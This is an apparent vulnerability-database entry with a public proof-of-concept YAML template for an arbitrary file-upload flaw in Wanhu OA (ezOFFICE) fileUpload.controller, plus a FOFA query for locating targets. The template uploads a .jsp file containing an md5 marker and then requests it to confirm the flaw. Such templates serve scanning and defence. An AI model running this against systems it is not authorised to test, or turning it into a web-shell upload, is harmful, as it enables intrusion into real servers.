wanhu-oa-fileupload-controller-upload: Wanhu OA fileupload.controller file upload vulnerability

Date: 2025-09-01 | Affected software: wanhu-OA | PoC: public

Vulnerability description

fofa: app="万户网络-ezOFFICE"

PoC code [public]

id: wanhu-oa-fileupload-controller-upload

info:
  name: 万户 OA fileupload.controller 文件上传漏洞
  author: unknown
  severity: critical
  description: |
    fofa: app="万户网络-ezOFFICE"
  tags: wanhu,oa,fileupload
  created: 2024/07/16

set:
  rfilename: randomLowercase(4)
  md5str: md5(rfilename)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /defaultroot/upload/fileUpload.controller
      headers:
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
      body: "--WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{rfilename}}.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n{{md5str}}\r\n--WebKitFormBoundary{{rboundary}}--\r\n\r\n"
    expression: response.status == 200 && response.body.bcontains(b'success')
    output:
      search: r'"data":"(?P<filename>\d+).jsp"'.bsubmatch(response.body)
      uploadfilename: search['filename']
  r1:
    request:
      method: GET
      path: /defaultroot/upload/html/{{uploadfilename}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()
